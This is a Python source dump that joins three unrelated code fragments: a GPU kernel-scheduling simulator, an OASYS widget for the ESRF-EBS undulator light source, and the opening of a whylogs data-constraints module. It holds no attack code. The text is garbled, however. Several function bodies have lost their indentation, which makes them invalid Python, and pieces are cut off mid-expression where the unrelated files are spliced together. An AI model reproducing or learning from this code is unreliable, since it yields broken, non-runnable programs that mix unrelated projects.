    earliest block_start and the recorded end is the latest block_end over
    all SMs.

    :param sm_trace: list of per-SM trace DataFrames
    :return: dict mapping kernel_id -> [start, end]

    Fixes over the original: the old code ran both its "empty dict" and
    "non-empty dict" branches on the first SM (re-processing the same kernel
    ids twice) and called find_kernel_time() a second time with identical
    arguments inside the update branch.  A single merge loop gives the same
    result with half the work.
    """
    kern_dd = {}
    for df_sm in sm_trace:
        # all unique kernels that ran (fully or partially) on this sm
        for kern_id in df_sm.kernel_id.unique():
            startT, endT = find_kernel_time(df_sm, kern_id)
            if kern_id in kern_dd:
                # widen the recorded window if this sm extends it
                prev_start, prev_end = kern_dd[kern_id]
                kern_dd[kern_id] = [min(prev_start, startT), max(prev_end, endT)]
            else:
                kern_dd[kern_id] = [startT, endT]  # first sighting: add to dd
    return kern_dd
#------------------------------------------------------------------------------
# run a single gpu kernel one at a time
#------------------------------------------------------------------------------
def run_gpu_kernel(Gpu, sms_, sm_trace_, kern, kern_id):
sms = copy.deepcopy(sms_)
sm_trace = copy.deepcopy(sm_trace_)
sm_num = Gpu.sm_num
kernel_blocks = int(kern.gridDim) # total block for current kern
kern_start = kern.start_ms
# 1) find the which sm to start
# 2) compute whether kernel_start happens before previous kernel ends or not
sm2start, AfterPrevKern = find_sm2start(sm_trace, kern_start)
#---------------------------------------------------------
# Run after previous kernel
#---------------------------------------------------------
if AfterPrevKern:
# deactivate all the previous active blocks
for df_sm in sm_trace:
df_activeblk = df_sm.loc[df_sm['active'] == 1]
if not df_activeblk.empty:
myid = int(df_activeblk.iloc[0]['sm_id'])
for index, row in df_activeblk.iterrows(): # find the row index of active blocks
sm_trace[myid].loc[index]['active'] = 0 # deactivate
sms[myid].Rm(kern) # free the block resource
#---------------------------------------------------------
# Continue current kernel
#---------------------------------------------------------
for bid in range(kernel_blocks):
sm_id = (bid + sm2start) % sm_num
to_allocate_another_block = check_sm_resource(sms[sm_id], kern)
#----------------------------------
# there is enough resource to host the current block
#----------------------------------
if to_allocate_another_block == True:
sms[sm_id].Allocate_block(kern) # deduct resources on the current sm
#---------------------------------------
# register the block in the trace table
#---------------------------------------
block_start = None
offset = 0.0
if AfterPrevKern and bid < sm_num: # Noted: only the 1st block will adjut the kern_start
offset = kern_start
# if current sm trace table is empty, start from kern_start
# else find the blocks that will end soon, and retire them
if sm_trace[sm_id].empty:
block_start = kern_start
else:
# read the sm_trace table, find out all the active blocks on current sm, look for the earliest start
block_start = Search_block_start(sm_trace[sm_id], kern_id) + offset
block_end = block_start | |
# <reponame>oasys-esrf-kit/OASYS1-ESRF-Extensions  (dataset artifact, commented out to keep the file parseable)
import os, sys
import numpy
import scipy.constants as codata
from syned.storage_ring.magnetic_structures.undulator import Undulator
from syned.storage_ring.magnetic_structures import insertion_device
from PyQt5.QtGui import QPalette, QColor, QFont
from PyQt5.QtWidgets import QMessageBox, QApplication
from PyQt5.QtCore import QRect
from orangewidget import gui
from orangewidget import widget
from orangewidget.settings import Setting
from oasys.widgets.widget import OWWidget
from oasys.widgets import gui as oasysgui
from oasys.widgets import congruence
from oasys.widgets.gui import ConfirmDialog
from syned.storage_ring.light_source import LightSource, ElectronBeam
from syned.beamline.beamline import Beamline
from oasys.widgets.gui import ConfirmDialog
import orangecanvas.resources as resources
m2ev = codata.c * codata.h / codata.e
VERTICAL = 1
HORIZONTAL = 2
BOTH = 3
class OWEBS(OWWidget):
name = "ESRF-EBS ID Light Source"
description = "Syned: ESRF-EBS ID Light Source"
icon = "icons/ebs.png"
priority = 1
maintainer = "<NAME>"
maintainer_email = "<EMAIL>"
category = "ESRF-EBS Syned Light Sources"
keywords = ["data", "file", "load", "read"]
outputs = [{"name":"SynedData",
"type":Beamline,
"doc":"Syned Beamline",
"id":"data"}]
want_main_area = 1
MAX_WIDTH = 1320
MAX_HEIGHT = 700
IMAGE_WIDTH = 860
IMAGE_HEIGHT = 645
CONTROL_AREA_WIDTH = 405
TABS_AREA_HEIGHT = 650
TABS_AREA_HEIGHT = 625
CONTROL_AREA_WIDTH = 450
electron_energy_in_GeV = Setting(6.0)
electron_energy_spread = Setting(0.001)
ring_current = Setting(0.2)
number_of_bunches = Setting(0.0)
moment_xx = Setting(0.0)
moment_xxp = Setting(0.0)
moment_xpxp = Setting(0.0)
moment_yy = Setting(0.0)
moment_yyp = Setting(0.0)
moment_ypyp = Setting(0.0)
electron_beam_size_h = Setting(0.0)
electron_beam_divergence_h = Setting(0.0)
electron_beam_size_v = Setting(0.0)
electron_beam_divergence_v = Setting(0.0)
electron_beam_emittance_h = Setting(0.0)
electron_beam_emittance_v = Setting(0.0)
electron_beam_beta_h = Setting(0.0)
electron_beam_beta_v = Setting(0.0)
electron_beam_alpha_h = Setting(0.0)
electron_beam_alpha_v = Setting(0.0)
electron_beam_eta_h = Setting(0.0)
electron_beam_eta_v = Setting(0.0)
electron_beam_etap_h = Setting(0.0)
electron_beam_etap_v = Setting(0.0)
type_of_properties = Setting(1)
auto_energy = Setting(0.0)
auto_harmonic_number = Setting(1)
K_horizontal = Setting(1.0)
K_vertical = Setting(1.0)
period_length = Setting(0.010)
number_of_periods = Setting(10)
ebs_id_index = Setting(0)
gap_mm = Setting(0.0)
gap_min = Setting(5.0)
gap_max = Setting(20.0)
harmonic_max = Setting(3)
a0 = Setting(20.0)
a1 = Setting(0.2)
a2 = Setting(0.0)
a3 = Setting(0.0)
a4 = Setting(0.0)
a5 = Setting(0.0)
a6 = Setting(0.0)
# data_url = 'ftp://ftp.esrf.eu/pub/scisoft/syned/resources/jsrund.csv'
# create it in nice with the ID app: /segfs/tango/bin/jsrund
data_url = os.path.join(resources.package_dirname("orangecontrib.esrf.syned.data"), 'jsrund.csv')
data_dict = None
    def __init__(self):
        """Build the widget.

        Loads the ID parameter database from CSV, creates the "Send Data" /
        "Reset Fields" buttons, sizes the window, populates the control area
        (electron-beam parameters, ID parameters, gap settings, advanced
        gap-parametrization tab), creates the plot tabs and triggers a first
        update.
        """
        # load the ID parameter database (jsrund.csv) into self.data_dict
        self.get_data_dictionary_csv()

        # OLD FORMAT
        # self.data_url = "https://raw.githubusercontent.com/srio/shadow3-scripts/master/ESRF-LIGHTSOURCES-EBS/ebs_ids.json"
        # self.get_data_dictionary()

        # "Send Data" is also exposed as a widget action
        self.runaction = widget.OWAction("Send Data", self)
        self.runaction.triggered.connect(self.send_data)
        self.addAction(self.runaction)

        # ---------------------------- action buttons ----------------------------
        button_box = oasysgui.widgetBox(self.controlArea, "", addSpace=False, orientation="horizontal")

        button = gui.button(button_box, self, "Send Data", callback=self.send_data)
        font = QFont(button.font())
        font.setBold(True)
        button.setFont(font)
        palette = QPalette(button.palette()) # make a copy of the palette
        palette.setColor(QPalette.ButtonText, QColor('Dark Blue'))
        button.setPalette(palette) # assign new palette
        button.setFixedHeight(45)

        button = gui.button(button_box, self, "Reset Fields", callback=self.callResetSettings)
        font = QFont(button.font())
        font.setItalic(True)
        button.setFont(font)
        palette = QPalette(button.palette()) # make a copy of the palette
        palette.setColor(QPalette.ButtonText, QColor('Dark Red'))
        button.setPalette(palette) # assign new palette
        button.setFixedHeight(45)
        button.setFixedWidth(150)

        gui.separator(self.controlArea)

        # --------------------------- window geometry ----------------------------
        # place near the top-left of the available screen, clamped to MAX_WIDTH/MAX_HEIGHT
        geom = QApplication.desktop().availableGeometry()
        self.setGeometry(QRect(round(geom.width()*0.05),
                               round(geom.height()*0.05),
                               round(min(geom.width()*0.98, self.MAX_WIDTH)),
                               round(min(geom.height()*0.95, self.MAX_HEIGHT))))
        self.setMaximumHeight(self.geometry().height())
        self.setMaximumWidth(self.geometry().width())
        self.controlArea.setFixedWidth(self.CONTROL_AREA_WIDTH)

        # -------------------------- control-area tabs ---------------------------
        self.tabs_setting = oasysgui.tabWidget(self.controlArea)
        self.tabs_setting.setFixedHeight(self.TABS_AREA_HEIGHT)
        self.tabs_setting.setFixedWidth(self.CONTROL_AREA_WIDTH-5)

        self.tab_sou = oasysgui.createTabPage(self.tabs_setting, "Light Source Setting")

        # selector for a predefined ID from the database ("<None>" at index 0)
        gui.comboBox(self.tab_sou, self, "ebs_id_index", label="Load ID parameters from database list: ", labelWidth=350,
                     items=self.get_id_list(), callback=self.set_id, sendSelectedValue=False, orientation="horizontal")

        # ------------------ electron beam / machine parameters ------------------
        self.electron_beam_box = oasysgui.widgetBox(self.tab_sou, "Electron Beam/Machine Parameters", addSpace=False, orientation="vertical")

        oasysgui.lineEdit(self.electron_beam_box, self, "electron_energy_in_GeV", "Energy [GeV]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.electron_beam_box, self, "electron_energy_spread", "Energy Spread", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.electron_beam_box, self, "ring_current", "Ring Current [A]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)

        # how the beam properties are specified (selects which sub-box is shown)
        # NOTE(review): "papameters" typo below is user-visible but kept verbatim here
        gui.comboBox(self.electron_beam_box, self, "type_of_properties", label="Electron Beam Properties", labelWidth=350,
                     items=["From 2nd Moments", "From Size/Divergence", "From Twiss papameters","Zero emittance", "EBS (S28D)"],
                     callback=self.update_electron_beam,
                     sendSelectedValue=False, orientation="horizontal")

        # sub-box: second moments
        self.left_box_2_1 = oasysgui.widgetBox(self.electron_beam_box, "", addSpace=False, orientation="vertical", height=150)

        oasysgui.lineEdit(self.left_box_2_1, self, "moment_xx", "<x x> [m^2]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_1, self, "moment_xxp", "<x x'> [m.rad]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_1, self, "moment_xpxp", "<x' x'> [rad^2]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_1, self, "moment_yy", "<y y> [m^2]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_1, self, "moment_yyp", "<y y'> [m.rad]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_1, self, "moment_ypyp", "<y' y'> [rad^2]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)

        # sub-box: size / divergence
        self.left_box_2_2 = oasysgui.widgetBox(self.electron_beam_box, "", addSpace=False, orientation="vertical", height=150)

        oasysgui.lineEdit(self.left_box_2_2, self, "electron_beam_size_h", "Horizontal Beam Size \u03c3x [m]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_2, self, "electron_beam_size_v", "Vertical Beam Size \u03c3y [m]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_2, self, "electron_beam_divergence_h", "Horizontal Beam Divergence \u03c3'x [rad]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_2, self, "electron_beam_divergence_v", "Vertical Beam Divergence \u03c3'y [rad]", labelWidth=260, valueType=float, orientation="horizontal", callback=self.update)

        # sub-box: Twiss parameters, two columns (left = horizontal, right = vertical)
        self.left_box_2_3 = oasysgui.widgetBox(self.electron_beam_box, "", addSpace=False, orientation="horizontal",height=150)
        self.left_box_2_3_l = oasysgui.widgetBox(self.left_box_2_3, "", addSpace=False, orientation="vertical")
        self.left_box_2_3_r = oasysgui.widgetBox(self.left_box_2_3, "", addSpace=False, orientation="vertical")

        oasysgui.lineEdit(self.left_box_2_3_l, self, "electron_beam_emittance_h", "\u03B5x [m.rad]",labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_3_l, self, "electron_beam_alpha_h", "\u03B1x", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_3_l, self, "electron_beam_beta_h", "\u03B2x [m]", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_3_l, self, "electron_beam_eta_h", "\u03B7x", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_3_l, self, "electron_beam_etap_h", "\u03B7'x", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_3_r, self, "electron_beam_emittance_v", "\u03B5y [m.rad]",labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_3_r, self, "electron_beam_alpha_v", "\u03B1y", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_3_r, self, "electron_beam_beta_v", "\u03B2y [m]", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_3_r, self, "electron_beam_eta_v", "\u03B7y", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)
        oasysgui.lineEdit(self.left_box_2_3_r, self, "electron_beam_etap_v", "\u03B7'y", labelWidth=75, valueType=float, orientation="horizontal", callback=self.update)

        gui.rubber(self.controlArea)

        ###################
        # ----------------------------- ID parameters ----------------------------
        left_box_1 = oasysgui.widgetBox(self.tab_sou, "ID Parameters", addSpace=True, orientation="vertical")

        oasysgui.lineEdit(left_box_1, self, "period_length", "Period Length [m]", labelWidth=260,
                          valueType=float, orientation="horizontal", callback=self.update)
        # NOTE(review): valueType=float although number_of_periods defaults to an int — confirm intended
        oasysgui.lineEdit(left_box_1, self, "number_of_periods", "Number of Periods", labelWidth=260,
                          valueType=float, orientation="horizontal", callback=self.update)

        # left_box_1 is deliberately rebound: "Setting" box for K / gap / energy
        left_box_1 = oasysgui.widgetBox(self.tab_sou, "Setting", addSpace=True, orientation="vertical")

        # oasysgui.lineEdit(left_box_1, self, "K_horizontal", "Horizontal K", labelWidth=260, valueType=float, orientation="horizontal")
        oasysgui.lineEdit(left_box_1, self, "K_vertical", "Vertical K", labelWidth=260,
                          valueType=float, orientation="horizontal", callback=self.set_K)
        oasysgui.lineEdit(left_box_1, self, "gap_mm", "Undulator Gap [mm]",
                          labelWidth=250, valueType=float, orientation="horizontal",
                          callback=self.set_gap)

        # photon-energy / harmonic auto-tuning of the vertical K
        left_box_2 = oasysgui.widgetBox(left_box_1, "", addSpace=False, orientation="vertical")
        oasysgui.lineEdit(left_box_2, self, "auto_energy", "Photon Energy [eV]",
                          labelWidth=250, valueType=float, orientation="horizontal",
                          callback=self.auto_set_undulator_V)
        oasysgui.lineEdit(left_box_2, self, "auto_harmonic_number", "Harmonic",
                          labelWidth=250, valueType=int, orientation="horizontal",
                          callback=self.auto_set_undulator_V)

        ####################################################
        # --------------------------- advanced settings --------------------------
        tab_util = oasysgui.createTabPage(self.tabs_setting, "Settings")
        left_box_0 = oasysgui.widgetBox(tab_util, "Advanced settings",
                                        addSpace=False, orientation="vertical", height=450)

        oasysgui.lineEdit(left_box_0, self, "gap_min", "minimum gap",
                          labelWidth=260, valueType=float, orientation="horizontal",
                          callback=self.update)
        oasysgui.lineEdit(left_box_0, self, "gap_max", "maximum gap (for plots)",
                          labelWidth=260, valueType=float, orientation="horizontal",
                          callback=self.update)
        oasysgui.lineEdit(left_box_0, self, "harmonic_max", "maximum harmonic (for plots)",
                          labelWidth=260, valueType=int, orientation="horizontal",
                          callback=self.update)

        # gap parametrization coefficients a0..a6 (used by set_K)
        left_box_00 = oasysgui.widgetBox(left_box_0, "Gap parametrization", addSpace=False, orientation="vertical")
        oasysgui.lineEdit(left_box_00, self, "a0", "a0", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)
        oasysgui.lineEdit(left_box_00, self, "a1", "a1", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)
        oasysgui.lineEdit(left_box_00, self, "a2", "a2", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)
        oasysgui.lineEdit(left_box_00, self, "a3", "a3", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)
        oasysgui.lineEdit(left_box_00, self, "a4", "a4", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)
        oasysgui.lineEdit(left_box_00, self, "a5", "a5", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)
        oasysgui.lineEdit(left_box_00, self, "a6", "a6", labelWidth=260, valueType=float, orientation="horizontal", callback=self.set_K)

        # main-area plot tabs
        self.initializeTabs()

        # self.populate_gap_parametrization()
        # self.populate_electron_beam()
        # self.populate_magnetic_structure()
        # self.set_ebs_electron_beam()
        self.populate_settings_after_setting_K()
        self.set_visible()
        self.update()
def get_id_list(self):
    """Build the ID selector entries: "<None>" followed by one
    "ID<nn> <name>" label per insertion device in ``self.data_dict``.

    The "<None>" sentinel at index 0 keeps ``ebs_id_index`` equal to
    the dict index plus one.
    """
    sections = self.data_dict["straight_section"]
    names = self.data_dict["id_name"]
    labels = ["<None>"]
    for i, id_name in enumerate(names):
        labels.append("ID%02d %s" % (sections[i], id_name))
    return labels
def titles(self):
    """Titles of the four gap-scan plots, in tab order."""
    return [
        "K vs Gap",
        "B vs Gap",
        "Gap vs resonance energy",
        "Power vs Gap",
    ]
def xtitles(self):
    """X-axis label (gap in mm), repeated once per plot."""
    n_plots = len(self.titles())
    return ['Gap [mm]'] * n_plots
def ytitles(self):
    """Y-axis labels, one per plot, matching titles() order."""
    labels = ['K', 'B [T]', 'Photon energy [eV]', 'Power [W]']
    return labels
def initializeTabs(self):
    """Create the main-area tab widget: an "Info" text tab followed by one
    plot tab per entry of titles(), each holding a configured plot canvas.
    """
    self.tabs = oasysgui.tabWidget(self.mainArea)
    # Tab 0 is the textual info page; tabs 1..4 hold the gap-scan plots.
    self.tab = [oasysgui.createTabPage(self.tabs, "Info",),
                oasysgui.createTabPage(self.tabs, "K vs Gap"),
                oasysgui.createTabPage(self.tabs, "B vs Gap"),
                oasysgui.createTabPage(self.tabs, "Resonance vs Gap"),
                oasysgui.createTabPage(self.tabs, "Power vs Gap"),
                ]
    for tab in self.tab:
        tab.setFixedHeight(self.IMAGE_HEIGHT)
        tab.setFixedWidth(self.IMAGE_WIDTH)
    # Text area that update_info() fills with the light-source summary.
    self.info_id = oasysgui.textArea(height=self.IMAGE_HEIGHT-5, width=self.IMAGE_WIDTH-5)
    profile_box = oasysgui.widgetBox(self.tab[0], "", addSpace=True, orientation="horizontal",
                                     height = self.IMAGE_HEIGHT, width=self.IMAGE_WIDTH-5)
    profile_box.layout().addWidget(self.info_id)
    n_plots = len(self.titles())
    # NOTE(review): one extra slot is allocated beyond n_plots but only the
    # first n_plots entries are populated here — presumably reserved; confirm.
    self.plot_canvas = [None] * (1 + n_plots)
    for i in range(n_plots):
        self.plot_canvas[i] = oasysgui.plotWindow(roi=False, control=False, position=True)
        self.plot_canvas[i].setDefaultPlotLines(True)
        self.plot_canvas[i].setActiveCurveColor(color='blue')
        self.plot_canvas[i].setGraphXLabel(self.xtitles()[i])
        self.plot_canvas[i].setGraphYLabel(self.ytitles()[i])
        self.plot_canvas[i].setGraphTitle(self.titles()[i])
        self.plot_canvas[i].setInteractiveMode(mode='zoom')
    # Attach plot canvas i to tab i+1 (tab 0 is the info page).
    for index in range(0, 4):
        self.tab[index + 1].layout().addWidget(self.plot_canvas[index])
    self.tabs.setCurrentIndex(1)
def check_magnetic_structure(self):
    """Validate the undulator inputs: K values must be non-negative,
    period length and number of periods strictly positive.

    Raises whatever the congruence validators raise on bad input.
    """
    checks = (
        (congruence.checkPositiveNumber, self.K_horizontal, "Horizontal K"),
        (congruence.checkPositiveNumber, self.K_vertical, "Vertical K"),
        (congruence.checkStrictlyPositiveNumber, self.period_length, "Period Length"),
        (congruence.checkStrictlyPositiveNumber, self.number_of_periods, "Number of Periods"),
    )
    for check, quantity, label in checks:
        check(quantity, label)
def get_magnetic_structure(self):
    """Return a syned InsertionDevice built from the widget's K values,
    period length and number of periods."""
    parameters = dict(
        K_horizontal=self.K_horizontal,
        K_vertical=self.K_vertical,
        period_length=self.period_length,
        number_of_periods=self.number_of_periods,
    )
    return insertion_device.InsertionDevice(**parameters)
def set_ebs_electron_beam(self):
    """Load the nominal EBS electron-beam parameters into the widget:
    RMS sizes/divergences, phase-space second moments, and Twiss
    parameters taken from the current light source, plus fixed emittances.
    """
    self.type_of_properties = 1
    # Nominal RMS beam sizes [m] and divergences [rad].
    self.electron_beam_size_h = 30.1836e-6
    self.electron_beam_size_v = 3.63641e-6
    self.electron_beam_divergence_h = 4.36821e-6
    self.electron_beam_divergence_v = 1.37498e-6
    #
    electron_beam = self.get_light_source().get_electron_beam()
    # Second moments of the phase-space distribution, unpacked straight
    # into the widget attributes (same order as get_moments_all()).
    (self.moment_xx, self.moment_xxp, self.moment_xpxp,
     self.moment_yy, self.moment_yyp, self.moment_ypyp) = electron_beam.get_moments_all()
    # Twiss parameters (dispersion-free form).
    e_x, alpha_x, beta_x, e_y, alpha_y, beta_y = electron_beam.get_twiss_no_dispersion_all()
    self.electron_beam_beta_h = beta_x
    self.electron_beam_beta_v = beta_y
    self.electron_beam_alpha_h = alpha_x
    self.electron_beam_alpha_v = alpha_y
    # NOTE(review): the first/fourth values returned by
    # get_twiss_no_dispersion_all() are stored as eta here, while the
    # emittances below are overwritten with constants — confirm this
    # assignment is intended.
    self.electron_beam_eta_h = e_x
    self.electron_beam_eta_v = e_y
    self.electron_beam_etap_h = 0.0
    self.electron_beam_etap_v = 0.0
    # Nominal EBS emittances [m rad].
    self.electron_beam_emittance_h = 1.3166e-10
    self.electron_beam_emittance_v = 5e-12
def update_electron_beam(self):
    """React to an electron-beam selection change: reload the EBS preset
    when mode 4 is selected, then refresh widget visibility and plots."""
    needs_ebs_preset = (self.type_of_properties == 4)
    if needs_ebs_preset:
        self.set_ebs_electron_beam()
    self.set_visible()
    self.update()
def update(self):
    """Refresh the textual info tab, then all gap-scan plots."""
    for refresh in (self.update_info, self.update_plots):
        refresh()
def update_info(self):
syned_light_source = self.get_light_source()
syned_electron_beam = syned_light_source.get_electron_beam()
syned_undulator = syned_light_source.get_magnetic_structure()
gamma = self.gamma()
if self.ebs_id_index == 0:
id = "<None>"
else:
id = "ID%02d %s" % (self.data_dict["straight_section"][self.ebs_id_index-1], self.data_dict["id_name"][self.ebs_id_index-1])
info_parameters = {
"electron_energy_in_GeV":self.electron_energy_in_GeV,
"gamma":"%8.3f"%self.gamma(),
"ring_current":"%4.3f "%syned_electron_beam.current(),
"K_horizontal":syned_undulator.K_horizontal(),
"K_vertical": syned_undulator.K_vertical(),
"period_length": syned_undulator.period_length(),
"number_of_periods": syned_undulator.number_of_periods(),
"undulator_length": syned_undulator.length(),
"resonance_energy":"%6.3f"%syned_undulator.resonance_energy(gamma,harmonic=1),
"resonance_energy3": "%6.3f" % syned_undulator.resonance_energy(gamma,harmonic=3),
"resonance_energy5": "%6.3f" % syned_undulator.resonance_energy(gamma,harmonic=5),
"B_horizontal":"%4.2F"%syned_undulator.magnetic_field_horizontal(),
"B_vertical": "%4.2F" % syned_undulator.magnetic_field_vertical(),
"cc_1": "%4.2f" % (1e6*syned_undulator.gaussian_central_cone_aperture(gamma,1)),
"cc_3": "%4.2f" % (1e6*syned_undulator.gaussian_central_cone_aperture(gamma,3)),
"cc_5": "%4.2f" % (1e6*syned_undulator.gaussian_central_cone_aperture(gamma,5)),
# "cc_7": "%4.2f" % (self.gaussian_central_cone_aperture(7)*1e6),
"sigma_rad": "%5.2f" % (1e6*syned_undulator.get_sigmas_radiation(gamma,harmonic=1)[0]),
"sigma_rad_prime": "%5.2f" % (1e6*syned_undulator.get_sigmas_radiation(gamma,harmonic=1)[1]),
"sigma_rad3": "%5.2f" % (1e6*syned_undulator.get_sigmas_radiation(gamma,harmonic=3)[0]),
"sigma_rad_prime3": "%5.2f" % (1e6*syned_undulator.get_sigmas_radiation(gamma,harmonic=3)[1]),
"sigma_rad5": "%5.2f" % (1e6 * syned_undulator.get_sigmas_radiation(gamma, harmonic=5)[0]),
"sigma_rad_prime5": "%5.2f" % (1e6 * syned_undulator.get_sigmas_radiation(gamma, harmonic=5)[1]),
"first_ring_1": "%5.2f" | |
import copy
import datetime
import json
import logging
import numbers
import re
from typing import Any, List, Mapping, Optional, Set, Tuple, Union
import datasketches
import jsonschema
import numpy as np
import pandas as pd
from datasketches import theta_a_not_b, update_theta_sketch
from dateutil.parser import parse
from google.protobuf.json_format import Parse
from google.protobuf.struct_pb2 import ListValue
from jsonschema import validate
from whylogs.core.statistics.hllsketch import HllSketch
from whylogs.core.statistics.numbertracker import DEFAULT_HIST_K
from whylogs.core.summaryconverters import (
compute_chi_squared_test_p_value,
compute_kl_divergence,
ks_test_compute_p_value,
single_quantile_from_sketch,
)
from whylogs.core.types import TypedDataConverter
from whylogs.proto import (
ApplyFunctionMsg,
DatasetConstraintMsg,
DatasetProperties,
InferredType,
KllFloatsSketchMessage,
MultiColumnValueConstraintMsg,
Op,
ReferenceDistributionContinuousMessage,
ReferenceDistributionDiscreteMessage,
SummaryBetweenConstraintMsg,
SummaryConstraintMsg,
SummaryConstraintMsgs,
ValueConstraintMsg,
ValueConstraintMsgs,
)
from whylogs.util.dsketch import FrequentItemsSketch
from whylogs.util.protobuf import message_to_json
# Shorthand alias for the protobuf inferred-type enum used throughout this module.
TYPES = InferredType.Type
# Module-level logger, named after this module.
logger = logging.getLogger(__name__)
def _try_parse_strftime_format(strftime_val: str, format: str) -> Optional[datetime.datetime]:
"""
Return whether the string is in a strftime format.
:param strftime_val: str, string to check for date
:param format: format to check if strftime_val can be parsed
:return None if not parseable, otherwise the parsed datetime.datetime object
"""
parsed = None
try:
parsed = datetime.datetime.strptime(strftime_val, format)
except (ValueError, TypeError):
pass
return parsed
def _try_parse_dateutil(dateutil_val: str, ref_val=None) -> Optional[datetime.datetime]:
    """Parse *dateutil_val* with dateutil's permissive date parser.

    :param dateutil_val: string to check for a date
    :param ref_val: unused; present to match the parser-function interface
    :return: the parsed datetime.datetime, or None when not parseable
    """
    try:
        return parse(dateutil_val)
    except (ValueError, TypeError):
        return None
def _try_parse_json(json_string: str, ref_val=None) -> Optional[dict]:
"""
Return whether the string can be interpreted as json.
:param json_string: str, string to check for json
:param ref_val: any, not used, interface design requirement
:return None if not parseable, otherwise the parsed json object
"""
parsed = None
try:
parsed = json.loads(json_string)
except (ValueError, TypeError):
pass
return parsed
def _matches_json_schema(json_data: Union[str, dict], json_schema: Union[str, dict]) -> bool:
    """Check whether *json_data* validates against *json_schema*.

    Either argument may be given as a JSON string, in which case it is
    decoded first (schema before data, as in the original flow); an
    undecodable string makes the whole check fail.

    :param json_data: json object (or JSON string) to check
    :param json_schema: schema (or JSON string) to validate against
    :return: True when the data matches the schema, False otherwise
    """
    decoded = []
    for item in (json_schema, json_data):
        if isinstance(item, str):
            try:
                item = json.loads(item)
            except (ValueError, TypeError):
                return False
        decoded.append(item)
    json_schema, json_data = decoded
    try:
        validate(instance=json_data, schema=json_schema)
    except (jsonschema.exceptions.ValidationError, jsonschema.exceptions.SchemaError):
        return False
    return True
# Cap on how many reference-set elements are rendered when a constraint's
# auto-generated name embeds a reference set, so huge sets don't bloat reports.
MAX_SET_DISPLAY_MESSAGE_LENGTH = 20
"""
Dict indexed by constraint operator.
These help translate from constraint schema to language-specific functions that are faster to evaluate.
This is just a form of currying, and I chose to bind the boolean comparison operator first.
"""
_value_funcs = {
# functions that compare an incoming feature value to a literal value.
Op.LT: lambda x: lambda v: v < x, # assert incoming value 'v' is less than some fixed value 'x'
Op.LE: lambda x: lambda v: v <= x,
Op.EQ: lambda x: lambda v: v == x,
Op.NE: lambda x: lambda v: v != x,
Op.GE: lambda x: lambda v: v >= x,
Op.GT: lambda x: lambda v: v > x, # assert incoming value 'v' is greater than some fixed value 'x'
Op.MATCH: lambda x: lambda v: x.match(v) is not None,
Op.NOMATCH: lambda x: lambda v: x.match(v) is None,
Op.IN: lambda x: lambda v: v in x,
Op.APPLY_FUNC: lambda apply_function, reference_value: lambda v: apply_function(v, reference_value),
}
_summary_funcs1 = {
    # functions that compare a summary field to a literal value.
    Op.LT: lambda f, v: lambda s: getattr(s, f) < v,
    Op.LE: lambda f, v: lambda s: getattr(s, f) <= v,
    Op.EQ: lambda f, v: lambda s: getattr(s, f) == v,
    Op.NE: lambda f, v: lambda s: getattr(s, f) != v,
    Op.GE: lambda f, v: lambda s: getattr(s, f) >= v,
    Op.GT: lambda f, v: lambda s: getattr(s, f) > v,
    # BTWN: summary field must lie in the closed interval [v1, v2].
    Op.BTWN: lambda f, v1, v2: lambda s: v1 <= getattr(s, f) <= v2,
    # The set operators compare theta sketches; a theta A-not-B estimate
    # rounded to one decimal equal to 0.0 is treated as "A is a subset of B".
    # Strings and numbers are tracked in separate sketches, so each test is
    # applied to both and chained with ==.
    # IN_SET: the column's observed values are a subset of the reference set.
    Op.IN_SET: lambda f, ref_str_sketch, ref_num_sketch: lambda update_obj: round(
        theta_a_not_b().compute(getattr(update_obj, f)["string_theta"], ref_str_sketch).get_estimate(), 1
    )
    == round(theta_a_not_b().compute(getattr(update_obj, f)["number_theta"], ref_num_sketch).get_estimate(), 1)
    == 0.0,
    # CONTAIN_SET: the reference set is a subset of the column's observed values.
    Op.CONTAIN_SET: lambda f, ref_str_sketch, ref_num_sketch: lambda update_obj: round(
        theta_a_not_b().compute(ref_str_sketch, getattr(update_obj, f)["string_theta"]).get_estimate(), 1
    )
    == round(theta_a_not_b().compute(ref_num_sketch, getattr(update_obj, f)["number_theta"]).get_estimate(), 1)
    == 0.0,
    # EQ_SET: subset in both directions, i.e. the sets are (approximately) equal.
